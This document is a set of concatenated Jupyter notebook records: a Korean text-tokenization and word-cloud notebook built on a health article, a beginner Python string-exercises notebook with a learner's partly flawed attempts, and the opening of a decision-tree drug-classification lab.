konlpy.tag import Mecab", "_____no_output_____" ], [ "mecab = Mecab()", "_____no_output_____" ], [ "x_train = list()\nokt = konlpy.tag.Okt()\nfor word in article:\n temp_x = okt.morphs(word, stem=True)\n words = list()\n for tok in temp_x:\n if tok not in stopwords:\n words.append(tok)\n x_train.append(words)\n\nprint(x_train)", "[['살'], [], [], ['찌'], ['고'], [], ['혈'], ['당'], [], [], ['오'], ['르'], ['늘다'], [], [], ['유'], ['늘다'], [], ['간'], ['단'], ['하'], ['다'], ['.'], [], ['많다'], [], [], ['먹다'], ['고'], [], ['움'], ['직'], [], ['지다'], [], ['않다'], ['기'], [], ['때'], ['문'], [], ['다'], ['.'], [], ['심'], ['지다'], ['어'], [], ['식'], ['사'], [], ['후'], [], ['바'], ['로'], [], ['누'], ['워'], [], [], ['늘다'], [], ['사'], ['람'], [], [], ['있다'], ['다'], ['.'], [], ['살'], ['을'], [], ['빼'], ['고'], [], ['혈'], ['당'], ['을'], [], ['관'], ['리'], ['하'], ['려'], ['면'], [], ['\"'], ['먹다'], ['었'], ['으'], ['면'], [], ['움'], ['직'], ['여'], ['라'], ['\"'], ['늘다'], [], ['말'], ['을'], [], ['새'], ['겨'], ['들다'], ['을'], [], ['필'], ['요'], ['가다'], [], ['있다'], ['다'], ['.'], [], ['일'], ['상'], ['생'], ['활'], [], ['서다'], [], ['혈'], ['당'], ['을'], [], ['내'], ['리'], ['고'], [], ['다'], [], ['어'], ['트'], [], [], ['좋다'], [], [], ['습'], ['관'], [], [], ['대다'], ['해'], [], ['알'], ['아'], ['보'], [], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['음'], ['식'], [], ['먹다'], ['으'], ['면'], [], ['오다'], ['라'], ['가다'], ['늘다'], [], ['혈'], ['당'], ['.'], ['.'], [], ['당'], ['뇨'], ['병'], [], ['예'], ['방'], ['-'], ['관'], ['리'], [], [], ['비'], ['상'], ['\\n'], ['\\n'], ['혈'], ['액'], [], ['속'], [], [], ['포'], ['함'], ['되다'], [], ['당'], ['('], ['포'], [], ['당'], [')'], [], [], ['농'], [], ['가다'], [], ['바'], ['로'], [], ['혈'], ['당'], [], ['다'], ['.'], [], ['음'], ['식'], ['을'], [], ['먹다'], ['으'], ['면'], [], ['포'], [], ['당'], [], [], ['만'], ['들다'], ['어'], ['지다'], ['고'], [], ['인'], ['슐'], ['린'], [], [], ['글'], ['루'], ['카'], ['곤'], [','], [], ['두'], [], ['가다'], ['지다'], [], ['물'], ['질'], [], [], [], ['해'], [], ['조'], ['절'], ['되다'], ['다'], ['.'], [], ['혈'], ['당'], [], [], ['식'], ['후'], [], [], ['오다'], ['라'], ['가다'], ['고'], [], ['공'], ['복'], [], ['상'], ['태'], ['가다'], [], ['되다'], ['면'], [], ['떨다'], ['어'], ['진'], ['다'], ['.'], [], ['많다'], [], [], ['먹다'], ['고'], [], ['자다'], [], ['움'], ['직'], [], ['질'], [], ['않다'], ['으'], ['면'], [], ['혈'], ['당'], [], ['조'], ['절'], ['을'], [], ['하'], ['늘다'], [], ['인'], ['슐'], ['린'], [], [], ['분'], ['비'], ['가다'], [], ['제'], ['대다'], ['로'], [], [], ['뤄'], ['지다'], ['지다'], [], ['않다'], ['늘다'], ['다'], ['.'], [], ['혈'], ['당'], [], [], ['높다'], ['아'], ['지다'], ['면'], [], ['당'], ['뇨'], ['병'], [], ['위'], ['허다'], [], [], ['크다'], ['진'], ['다'], ['.'], [], ['당'], ['뇨'], ['병'], [], [], ['걸'], ['리'], ['면'], [], ['완'], ['치'], ['가다'], [], ['없다'], ['다'], ['.'], [], ['평'], ['생'], [], ['관'], ['리'], ['해'], ['야'], [], [], ['다'], ['.'], [], ['심'], ['장'], ['병'], ['('], ['협'], ['심'], ['증'], [','], [], ['심'], ['근'], ['경'], ['색'], [')'], [], ['나'], [], ['뇌'], ['졸'], ['중'], ['('], ['뇌'], ['추다'], ['혈'], [','], [], ['뇌'], ['경'], ['색'], [')'], [], ['등'], [], ['혈'], ['관'], [], ['질'], ['환'], [], ['위'], ['허다'], [], [], ['높다'], ['아'], ['진'], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['식'], ['후'], [], ['입'], ['가다'], ['심'], ['으'], ['로'], [], ['케'], [], ['크다'], ['?'], ['\\n'], ['\\n'], ['식'], ['사'], [], [], [], [], ['뒤'], [], ['케'], [], ['크다'], [], [], ['먹다'], ['늘다'], [], ['경'], ['우'], ['가다'], [], ['있다'], ['다'], ['.'], [], ['하'], ['지다'], ['만'], [], ['설'], ['탕'], [','], [], ['꿀'], [','], [], ['물'], ['엿'], [','], [], ['시'], ['럽'], [','], [], ['초'], ['콜'], ['릿'], [','], [], ['사'], ['탕'], [','], [], ['타다'], ['산'], ['음'], ['료'], [], ['등'], [], ['단'], ['순'], ['당'], [], [], ['많다'], [], [], ['함'], ['유'], ['되다'], [], ['식'], ['품'], [], [], ['혈'], ['당'], ['을'], [], ['급'], ['격'], ['하'], ['게'], [], ['오다'], ['릴'], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['대다'], [], ['당'], ['뇨'], ['병'], ['학'], ['회'], [], [], ['따다'], ['르'], ['면'], [], ['단'], ['순'], ['당'], [], [], ['농'], ['축'], ['되다'], [], ['열'], ['량'], ['원'], [], ['기'], [], ['때'], ['문'], [], [], ['소'], ['화'], ['흡'], ['수'], ['가다'], [], ['빨'], ['라'], [], ['혈'], ['당'], ['을'], [], ['급'], ['속'], ['히'], [], ['높다'], ['일'], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['아'], ['침'], [], ['공'], ['복'], [], [], ['운'], ['동'], ['을'], [], ['하'], ['다'], [], ['저'], ['혈'], ['당'], [], [], ['빠'], ['진'], [], ['당'], ['뇨'], ['병'], [], ['환'], [], ['가다'], [], ['급'], ['하'], ['게'], [], ['당'], [], [], ['들다'], [], ['음'], ['식'], ['을'], [], ['찾다'], ['늘다'], [], ['것'], [], [], ['혈'], ['당'], ['을'], [], ['빠'], ['르'], ['게'], [], ['오다'], ['려'], ['야'], [], ['하'], ['기'], [], ['때'], ['문'], [], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], [], ['일'], [], [], ['식'], ['후'], [], [], ['먹다'], ['늘다'], ['다'], ['?'], [], ['\"'], ['식'], ['전'], [], [], ['드'], ['셔'], [], ['보'], ['세'], ['요'], ['\"'], ['\\n'], ['\\n'], ['식'], ['사'], [], ['후'], [], [], [], ['일'], ['을'], [], ['먹다'], ['늘다'], [], ['것'], [], [], ['일'], ['상'], ['화'], ['되다'], ['어'], [], ['있다'], ['다'], ['.'], [], ['하'], ['지다'], ['만'], [], ['혈'], ['당'], [], ['관'], ['리'], [], ['늘다'], [], ['좋다'], ['지다'], [], ['않다'], ['다'], ['.'], [], ['오'], ['히'], ['려'], [], ['식'], ['사'], [], ['전'], [], [], ['먹다'], ['으'], ['면'], [], [], ['식'], ['을'], [], ['막'], ['고'], [], ['혈'], ['당'], [], ['조'], ['절'], [], [], [], [], ['움'], [], [], ['되다'], ['다'], ['.'], [], ['자다'], [], ['익'], [], [], [], ['일'], [','], [], ['단'], [], ['맛'], [], [], ['강'], [], [], [], ['일'], [], [], ['당'], ['지다'], ['수'], ['가다'], [], ['높다'], ['다'], ['.'], [], ['평'], ['소'], [], ['혈'], ['당'], [], [], ['높다'], [], [], ['사'], ['람'], [], [], ['열'], ['대다'], [], ['일'], [], ['등'], [], ['단'], [], [], ['일'], ['을'], [], ['피'], ['해'], ['야'], [], [], ['다'], ['.'], [], ['건'], ['강'], [], [], ['사'], ['람'], [], ['라'], [], [], ['단'], [], [], ['일'], ['을'], [], [], ['식'], ['하'], ['지다'], [], ['않다'], ['늘다'], [], ['게'], [], ['좋다'], ['다'], ['.'], [], [], ['일'], [], [], ['많다'], [], [], ['먹다'], ['으'], ['면'], [], ['혈'], ['당'], ['을'], [], ['오다'], ['리'], ['고'], [], ['살'], [], [], ['찌다'], [], ['우'], ['려'], ['가다'], [], ['있다'], ['다'], ['.'], [], ['사'], [], ['늘다'], [], ['3'], ['분'], [], [], ['1'], ['쪽'], [','], [], ['바'], ['나'], ['나'], ['늘다'], [], ['반'], [], ['개'], [], ['정'], [], ['가다'], [], ['좋다'], ['다'], ['.'], [], ['토'], ['마'], ['토'], ['처'], ['럼'], [], ['당'], [], ['가다'], [], ['비'], ['교'], ['적'], [], ['낮'], ['고'], [], ['수'], ['분'], ['함'], ['량'], [], [], ['높다'], [], [], ['채'], ['소'], ['나'], [], [], ['일'], [], [], ['작'], [], [], ['크다'], ['기'], [], ['2'], ['개'], [], [], ['먹다'], ['어'], [], [], ['되다'], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['닭'], [], ['칼'], ['국'], ['수'], [','], [], ['콩'], ['국'], ['수'], ['가다'], [], ['혈'], ['당'], [], ['관'], ['리'], [], [], ['좋다'], [], [], [], ['유'], ['\\n'], ['\\n'], ['밥'], [','], [], ['빵'], [','], [], ['떡'], [','], [], ['국'], ['수'], [], ['같다'], [], [], ['타다'], ['수'], ['화'], ['물'], [], [], ['음'], ['식'], [], [], ['당'], ['지다'], ['수'], ['가다'], [], ['높다'], ['아'], [], ['혈'], ['당'], ['을'], [], ['빨'], ['리'], [], ['오다'], ['린'], ['다'], ['.'], [], [], ['런'], [], ['음'], ['식'], ['들다'], [], [], ['혈'], ['당'], ['을'], [], ['천'], ['천'], ['히'], [], ['오다'], ['리'], ['늘다'], [], ['살'], ['코'], ['기'], ['('], ['쇠'], ['고'], ['기'], [','], [], ['돼다'], ['지다'], ['고'], ['기'], [','], [], ['닭'], ['고'], ['기'], [], ['등'], [')'], [','], [], ['생'], ['선'], [], ['같다'], [], [], ['단'], ['백'], ['질'], [], [], ['함'], ['께'], [], ['먹다'], ['으'], ['면'], [], ['혈'], ['당'], [], ['상'], ['승'], ['을'], [], ['느'], ['리'], ['게'], [], [], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['닭'], [], ['가다'], ['슴'], ['살'], [], [], ['들다'], [], ['칼'], ['국'], ['수'], ['나'], [], ['콩'], [], ['단'], ['백'], ['질'], [], [], ['풍'], ['부'], [], [], ['콩'], ['국'], ['수'], [], [], [], ['움'], [], [], ['되다'], ['다'], ['.'], [], ['콩'], [], [], ['포'], [], ['당'], [], ['나'], [], ['콜'], ['레'], ['스'], ['테'], ['롤'], [], [], ['흡'], ['수'], [], [], ['지다'], ['연'], ['시'], ['켜'], [], ['혈'], ['당'], [], [], ['서다'], ['서다'], ['히'], [], ['오'], ['르'], ['게'], [], [], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['식'], ['초'], ['늘다'], [], ['맛'], ['?'], [], ['\"'], ['건'], ['강'], ['효'], [], [], ['따다'], ['로'], [], ['있다'], ['어'], ['요'], ['\"'], ['\\n'], ['\\n'], ['식'], ['초'], ['늘다'], [], ['시'], ['크다'], [], [], ['맛'], [], ['뿐'], [], ['아'], ['니'], ['라'], [], ['혈'], ['당'], [], ['조'], ['절'], [], [], ['효'], [], [], [], ['내다'], ['다'], ['.'], [], ['혈'], ['당'], ['을'], [], ['천'], ['천'], ['히'], [], ['오다'], ['리'], ['기'], [], ['때'], ['문'], [], [], ['음'], ['식'], ['물'], [], [], ['넣다'], ['어'], [], ['먹다'], ['으'], ['면'], [], ['건'], ['강'], [], [], ['좋다'], ['다'], ['.'], [], ['짜다'], ['장'], ['면'], ['을'], [], ['먹다'], ['을'], [], ['때'], [], ['단'], ['무'], ['지다'], [], [], ['식'], ['초'], [], [], ['뿌'], ['리'], ['면'], [], ['혈'], ['당'], [], ['조'], ['절'], [], [], [], ['움'], [], [], ['되다'], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['늘'], [], ['밥'], [], [], ['곁'], ['들다'], [], ['늘다'], [], ['나'], ['물'], ['을'], [], ['만'], ['들다'], [], ['때'], [], [], ['식'], ['초'], [], [], ['활'], ['용'], ['해'], ['보'], [], ['.'], [], ['타다'], ['수'], ['화'], ['물'], [], [], ['많다'], [], [], ['밥'], [], [], ['혈'], ['당'], [], ['상'], ['승'], ['을'], [], ['주'], [], ['하'], ['늘다'], [], ['것'], ['을'], [], ['줄'], ['일'], [], ['수'], [], ['있다'], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['\"'], ['식'], ['사'], [], ['후'], [], ['몸'], ['을'], [], ['꼭'], [], ['움'], ['직'], [], ['세'], ['요'], ['\"'], ['\\n'], ['\\n'], ['운'], ['동'], [], [], ['칼'], ['로'], ['리'], [], [], ['소'], ['모'], ['시'], ['키'], ['고'], [], ['혈'], ['당'], ['을'], [], ['직'], ['접'], ['적'], ['으'], ['로'], [], ['떨다'], ['어'], ['뜨다'], ['린'], ['다'], ['.'], [], [], ['밉다'], [], ['당'], ['뇨'], ['병'], [], [], ['있다'], ['다'], ['면'], [], ['혈'], ['관'], [], ['질'], ['환'], [], ['등'], [], ['합'], ['병'], ['증'], ['을'], [], ['예'], ['방'], [], ['다'], ['.'], [], ['아'], ['침'], [], ['식'], ['사'], [], ['후'], [], ['대다'], ['중'], ['교'], ['통'], ['을'], [], [], ['용'], ['하'], ['면'], [], ['걷다'], ['기'], [','], [], ['계'], ['단'], [], ['오'], ['르'], ['기'], [], ['등'], [], ['운'], ['동'], ['을'], [], [], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['하'], ['지다'], ['만'], [], ['점'], ['심'], [','], [], ['저'], ['녁'], [], ['식'], ['사'], [], ['후'], ['가다'], [], ['문'], ['제'], ['다'], ['.'], [], ['혈'], ['당'], [], [], ['가다'], ['장'], [], ['높다'], ['아'], ['지다'], ['늘다'], [], ['시'], ['간'], [], [], ['식'], ['후'], [], ['3'], ['0'], ['분'], ['~'], ['1'], ['시'], ['간'], [], ['사'], [], ['다'], ['.'], [], ['따다'], ['라'], ['서다'], [], ['운'], ['동'], [], [], ['최'], ['적'], [], ['시'], ['기'], ['늘다'], [], ['식'], ['후'], [], ['3'], ['0'], ['분'], ['~'], ['1'], ['시'], ['간'], [], [], ['후'], ['라'], ['고'], [], [], [], ['수'], [], ['있다'], ['다'], ['.'], [], ['직'], ['장'], ['인'], [], [], [], [], [], [], ['앉다'], ['기'], [], ['보'], ['다'], ['늘다'], [], ['가다'], ['급'], ['적'], [], ['서다'], ['서다'], [], ['업'], ['무'], [], [], ['보'], ['거'], ['나'], [], ['복'], [], [], [], ['걷다'], ['늘다'], [], ['것'], [], [], ['좋다'], ['다'], ['.'], ['\\n'], ['\\n'], ['◆'], [], ['식'], ['후'], [], ['바'], ['로'], [], ['눕다'], ['늘다'], [], ['것'], [], [], ['최'], ['악'], ['.'], ['.'], [], ['걷다'], ['기'], ['가다'], [], ['최'], ['선'], ['\\n'], ['\\n'], ['식'], ['사'], [], ['후'], [], ['바'], ['로'], [], ['눕다'], ['늘다'], [], ['것'], [], [], ['최'], ['악'], [], ['다'], ['.'], [], ['입'], ['속'], ['으'], ['로'], [], ['신'], ['물'], [], [], ['오다'], ['라'], ['오'], ['늘다'], [], ['위'], ['식'], [], ['역'], ['류'], ['질'], ['환'], [], ['위'], ['허다'], [], [], ['높다'], ['아'], ['진'], ['다'], ['.'], [], ['걷다'], ['기'], ['가다'], [], ['가다'], ['장'], [], ['좋다'], ['지다'], ['만'], [], ['거'], ['실'], [], ['나'], [], ['방'], ['을'], [], ['어'], ['슬'], ['렁'], ['거'], ['려'], [], [], ['좋다'], ['다'], ['.'], [], ['3'], ['0'], ['분'], [], ['정'], [], [], ['몸'], ['을'], [], ['움'], ['직'], [], ['면'], [], ['혈'], ['당'], ['을'], [], ['내'], ['리'], ['고'], [], ['소'], ['화'], [], [], [], ['크다'], [], [], ['움'], [], [], ['되다'], ['다'], ['.'], [], ['당'], ['뇨'], ['병'], [], [], ['좋다'], [], [], ['운'], ['동'], [], [], ['숨'], [], [], ['조'], ['금'], [], ['찰'], [], ['정'], [], [], [], ['강'], [], ['로'], [], ['하'], ['루'], [], [], ['3'], ['0'], ['∼'], ['6'], ['0'], ['분'], [], ['가다'], ['량'], [','], [], ['일'], ['주'], ['일'], [], [], ['3'], ['~'], ['4'], ['차'], ['례'], ['늘다'], [], ['해'], ['야'], [], [], ['다'], ['.'], [], ['무'], ['리'], [], [], ['운'], ['동'], ['보'], ['다'], ['늘다'], [], ['빠'], ['르'], ['게'], [], ['걷다'], ['기'], [','], [], [], ['전'], ['거'], [], ['타'], ['기'], [], ['등'], [], [], ['좋다'], ['다'], ['.'], [], ['무'], ['엇'], ['보'], ['다'], [], ['중'], ['요'], [], [], ['것'], [], [], ['\"'], ['먹다'], ['었'], ['으'], ['면'], [], ['움'], ['직'], ['여'], ['라'], ['\"'], ['늘다'], [], ['말'], ['을'], [], ['실'], ['천'], ['하'], ['늘다'], [], ['것'], [], ['다'], ['.'], ['\\n'], ['.']]\n" ], [ "wc = WordCloud(max_font_size=200, background_color='white', font_path ='./H2PORL.TTF', max_words=20, width=800, height=800) # FONT는 인터넷에서 불러올수 있는 것으로 변경\nwc.generate(article)\n\nplt.figure(figsize=(15, 12)) # 경제 : $이나 \\ / 정치 -> 국회의사당 / 스포츠 : MLB나 NBA /\nplt.imshow(wc)\nplt.axis('off') # 축 제거\nplt.show()", "_____no_output_____" ], [ "import tensorflow as tf", "_____no_output_____" ], [ "tokenizer = tf.keras.preprocessing.text.Tokenizer()\ntokenizer.fit_on_texts(article)", "_____no_output_____" ], [ "tokenizer.word_index", "_____no_output_____" ], [ "knu=read.csv(\"data/KnuSentiLex-master/SentiWord_Dict.txt\")", "_____no_output_____" ], [ "url=\"https://news.naver.com/main/ranking/read.nhn?mid=etc&sid1=111&rankingType=popular_day&oid=003&aid=0008737816&date=20180802&type=1&rankingSeq=8&rankingSectionId=100\" # URL\npage <- read_html(url,encoding = \"euc-kr\") # 인코딩 확인하기 \ndoc <- page%>%html_nodes(\"#articleBodyContents\")%>%html_text()\ndoc", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "code", "markdown", "code" ]
[ [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e72e29f3057a252d31e1c4b7e9a75311b2c59be6
13,788
ipynb
Jupyter Notebook
Week 1/.ipynb_checkpoints/Lesson_1_Python_Strings_Fundamentals_Assignment-checkpoint.ipynb
KingsleyNA/UESTC-Python-Walkthroughs
131f6ec1319c288688efd6259bf4036205029f4a
[ "MIT" ]
1
2021-08-16T12:32:20.000Z
2021-08-16T12:32:20.000Z
Week 1/.ipynb_checkpoints/Lesson_1_Python_Strings_Fundamentals_Assignment-checkpoint.ipynb
KingsleyNA/UESTC-Python-Walkthroughs
131f6ec1319c288688efd6259bf4036205029f4a
[ "MIT" ]
null
null
null
Week 1/.ipynb_checkpoints/Lesson_1_Python_Strings_Fundamentals_Assignment-checkpoint.ipynb
KingsleyNA/UESTC-Python-Walkthroughs
131f6ec1319c288688efd6259bf4036205029f4a
[ "MIT" ]
null
null
null
23.329949
124
0.475921
[ [ [ "# Python String Exercises to Pull ", "_____no_output_____" ], [ "#### Question 1 \nGiven a string of odd length greater than 7, return a new string made of the middle three characters of a given String", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\ninput_string = \"JhonDipPetaJhonDipPetaJhonDipPetaJhonDipPetaJhonDipPetaJhonDipPetaJhonDipPeta\" \n# expected_output: \"Dip\"\n\n# input_string = \"JaSonAy\"\n# expected_output: \"Son\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\nmid = int(len(input_string)/2)\nmid3 = input_string[mid-1 : mid+2]\n\nprint(mid3)\n\n\n", "Dip\n" ] ], [ [ "#### Question 2 \nGiven two strings, s1 and s2, create a new string by appending s2 in the middle of s1", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\n# s1 = \"Ault\"\n# s2 = \"Kelly\"\n\n# expected_output: \"AuKellylt\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\nstring1 = \"abcdefg\"\npart = string1[4:]\n\nprint(part)\n", "efg\n" ] ], [ [ "#### Question 3\nGiven two strings, s1, and s2 return a new string made of the first, middle, and last characters each input string", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\ns1 = \"AmericaAmericaAmericaAmericaAmericaAmericaAmericaAmericaAmerica\"\ns2 = \"JapanAmericaAmericaAmericaAmericaAmericaAmericaAmericaAmericaAmerica\"\n\n# expected_output: \"AJrpan\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\n\nfirst = s1[0] + s2[0]\nmid = s1[int(len(s1)/2)] + s2[int(len(s2)/2)]\nlast = s1[-1] + s2[-1]\n\nprint(first + mid + last)\n", "AJrmaa\n" ] ], [ [ "#### Question 4\nCount all digits from a given string", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\n# s1 = \"a1b2c3d4e5\"\n# s2 = \"Japan\"\n\n# expected_output: \"There are 5 digits in the string.\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\n", "_____no_output_____" ] ], [ [ "#### Question 5\nFind all occurrences of a given word in a given string", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\nword = \"UESTC\"\ns1 = \"UESTC is young.UESTC is in Sichuan.UESTC is fun.\"\n\n# expected_output: \"There are 3 occurences of UESTC.\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\ns1 = s1.split()\nprint(s1)\n\n\ncount = 0\n\nfor _ in s1:\n if _ == word:\n count = count + 1\n\nprint(\"There are\", count, \"Uestc(s)in the sentence\")\n\n", "['UESTC', 'is', 'young.UESTC', 'is', 'in', 'Sichuan.UESTC', 'is', 'fun.']\nThere are 1 Uestc(s)in the sentence\n" ] ], [ [ "#### Question 6\nGiven a string, find the sum of all the numbers in the string.", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\ns1 = \"1 potato, 20001 potatoes, 3 potatoes 4 5 ...\"\n# expected_output: \"The sum of the numbers in the string is 6\"\n\n# s2 = \"On the tenth day of Christmas my true love sent to me: \n# 10 Lords a Leaping, 9 Ladies Dancing, 8 Maids a Milking,\n# 7 Swans a Swimming, 6 Geese a Laying, 5 Golden Rings,\n# 4 Calling Birds, 3 French Hens, 2 Turtle Doves\n# and a Partridge in a Pear Tree.\"\n# expected_output: \"The sum of the numbers in the string is 54\"\n\n#---------------------------------------\n\n\n# Your Solution Here\n\ncount = 0\n\ns1 = s1.split()\nprint(s1)\n\nfor word in s1:\n if word.isdigit():\n count+= int(word)\ncount", "['1', 'potato,', '20001', 'potatoes,', '3', 'potatoes', '4', '5', '...']\n" ] ], [ [ "#### Question 7:\nReverse the string\nNote, do not use any special functions like \"reverse\".", "_____no_output_____" ] ], [ [ "#---- Examples -------------------------\n\n# s1 = \"Delali adniL\"\n# expected_output: \"Linda Delali\"\n\n#---------------------------------------\n\n\ns1 = \"My very eye may just see\"\n\ns2 = \"eye\".reverse()\n\ns2 == \"eye\"\n\n\n# Your Solution Here", "_____no_output_____" ], [ "#isdigit, isnumeric, isdecimal\n\nnum = \"23\"\n\nprint(num.isdigit())\nprint(num.isnumeric())\nprint(num.isdecimal())\n\nprint(type(num))", "True\nTrue\nTrue\n<class 'str'>\n" ], [ "a = \"1\"\nb = \"2\"\n\nprint(\"3\")", "3\n" ], [ "def add(x,y):\n return x+y\n\nadd(30,35)", "_____no_output_____" ], [ "brute-force\nbasic\n---\nmemoization\ndynamic programming", "_____no_output_____" ] ], [ [ "# Great Methods with Strings", "_____no_output_____" ], [ "#### capitalize()\t\nConverts the first character to upper case\n\n#### casefold()\t\nConverts string into lower case\n\n#### center()\t\nReturns a centered string\n\n#### count()\t\nReturns the number of times a specified value occurs in a string\n\n#### encode()\t\nReturns an encoded version of the string\n\n#### endswith()\t\nReturns true if the string ends with the specified value\n\n#### expandtabs()\t\nSets the tab size of the string\n\n#### find()\t\nSearches the string for a specified value and returns the position of where it was found\n\n#### format()\t\nFormats specified values in a string\n\n#### format_map()\t\nFormats specified values in a string\n\n#### index()\t\nSearches the string for a specified value and returns the position of where it was found\n\n#### isalnum()\t\nReturns True if all characters in the string are alphanumeric\n\n#### isalpha()\t\nReturns True if all characters in the string are in the alphabet\n\n#### isdecimal()\t\nReturns True if all characters in the string are decimals\n\n#### isdigit()\t\nReturns True if all characters in the string are digits\n\n#### isidentifier()\t\nReturns True if the string is an identifier\n\n#### islower()\t\nReturns True if all characters in the string are lower case\n\n#### isnumeric()\t\nReturns True if all characters in the string are numeric\n\n#### isprintable()\t\nReturns True if all characters in the string are printable\n\n#### isspace()\t\nReturns True if all characters in the string are whitespaces\n\n#### istitle()\t\nReturns True if the string follows the rules of a title\n\n#### isupper()\t\nReturns True if all characters in the string are upper case\n\n#### join()\t\nJoins the elements of an iterable to the end of the string\n\n#### ljust()\t\nReturns a left justified version of the string\n\n#### lower()\t\nConverts a string into lower case\n\n#### lstrip()\t\nReturns a left trim version of the string", "_____no_output_____" ], [ "#### maketrans()\t\nReturns a translation table to be used in translations\n\n#### partition()\t\nReturns a tuple where the string is parted into three parts\n\n#### replace()\t\nReturns a string where a specified value is replaced with a specified value\n\n#### rfind()\t\nSearches the string for a specified value and returns the last position of where it was found\n\n#### rindex()\t\nSearches the string for a specified value and returns the last position of where it was found\n\n#### rjust()\t\nReturns a right justified version of the string\n\n#### rpartition()\t\nReturns a tuple where the string is parted into three parts\n\n#### rsplit()\t\nSplits the string at the specified separator, and returns a list\n\n#### rstrip()\t\nReturns a right trim version of the string\n\n#### split()\t\nSplits the string at the specified separator, and returns a list\n\n#### splitlines()\t\nSplits the string at line breaks and returns a list\n\n#### startswith()\t\nReturns true if the string starts with the specified value\n\n#### strip()\t\nReturns a trimmed version of the string\n\n#### swapcase()\t\nSwaps cases, lower case becomes upper case and vice versa\n\n#### title()\t\nConverts the first character of each word to upper case\n\n#### translate()\t\nReturns a translated string\n\n#### upper()\t\nConverts a string into upper case\n\n#### zfill()\t\nFills the string with a specified number of 0 values at the beginning", "_____no_output_____" ] ], [ [ "s1 = \"Great\"\n\nprint(num.isdigit())\nprint(num.isnumeric())\nprint(num.isdecimal())", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ] ]
e72e30372a6320b3de10c4f98c7ed74f14e81904
557,315
ipynb
Jupyter Notebook
Drug Prescription via Decision Tree Classifier/ML0101EN-Clas-Decision-Trees-drug-py-v1.ipynb
Syed-Sherjeel/Classification-Problems
9abdd45a339ff1df0792748b83ab49424fc813fd
[ "MIT" ]
null
null
null
Drug Prescription via Decision Tree Classifier/ML0101EN-Clas-Decision-Trees-drug-py-v1.ipynb
Syed-Sherjeel/Classification-Problems
9abdd45a339ff1df0792748b83ab49424fc813fd
[ "MIT" ]
null
null
null
Drug Prescription via Decision Tree Classifier/ML0101EN-Clas-Decision-Trees-drug-py-v1.ipynb
Syed-Sherjeel/Classification-Problems
9abdd45a339ff1df0792748b83ab49424fc813fd
[ "MIT" ]
null
null
null
254.947392
377,124
0.873587
[ [ [ "\n# Decision Trees\n\nEstaimted time needed: **15** minutes\n\n## Objectives\n\nAfter completing this lab you will be able to:\n\n- Develop a classification model using Decision Tree Algorithm\n", "_____no_output_____" ], [ "In this lab exercise, you will learn a popular machine learning algorithm, Decision Tree. You will use this classification algorithm to build a model from historical data of patients, and their response to different medications. Then you use the trained decision tree to predict the class of a unknown patient, or to find a proper drug for a new patient.\n", "_____no_output_____" ], [ "<h1>Table of contents</h1>\n\n<div class=\"alert alert-block alert-info\" style=\"margin-top: 20px\">\n <ol>\n <li><a href=\"#about_dataset\">About the dataset</a></li>\n <li><a href=\"#downloading_data\">Downloading the Data</a></li>\n <li><a href=\"#pre-processing\">Pre-processing</a></li>\n <li><a href=\"#setting_up_tree\">Setting up the Decision Tree</a></li>\n <li><a href=\"#modeling\">Modeling</a></li>\n <li><a href=\"#prediction\">Prediction</a></li>\n <li><a href=\"#evaluation\">Evaluation</a></li>\n <li><a href=\"#visualization\">Visualization</a></li>\n </ol>\n</div>\n<br>\n<hr>\n", "_____no_output_____" ], [ "Import the Following Libraries:\n\n<ul>\n <li> <b>numpy (as np)</b> </li>\n <li> <b>pandas</b> </li>\n <li> <b>DecisionTreeClassifier</b> from <b>sklearn.tree</b> </li>\n</ul>\n", "_____no_output_____" ] ], [ [ "import numpy as np \nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier", "_____no_output_____" ] ], [ [ "<div id=\"about_dataset\">\n <h2>About the dataset</h2>\n Imagine that you are a medical researcher compiling data for a study. You have collected data about a set of patients, all of whom suffered from the same illness. During their course of treatment, each patient responded to one of 5 medications, Drug A, Drug B, Drug c, Drug x and y. \n <br>\n <br>\n Part of your job is to build a model to find out which drug might be appropriate for a future patient with the same illness. The feature sets of this dataset are Age, Sex, Blood Pressure, and Cholesterol of patients, and the target is the drug that each patient responded to.\n <br>\n <br>\n It is a sample of binary classifier, and you can use the training part of the dataset \n to build a decision tree, and then use it to predict the class of a unknown patient, or to prescribe it to a new patient.\n</div>\n", "_____no_output_____" ], [ "<div id=\"downloading_data\"> \n <h2>Downloading the Data</h2>\n To download the data, we will use !wget to download it from IBM Object Storage.\n</div>\n", "_____no_output_____" ] ], [ [ "!wget -O drug200.csv https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/drug200.csv", "--2020-10-11 10:54:57-- 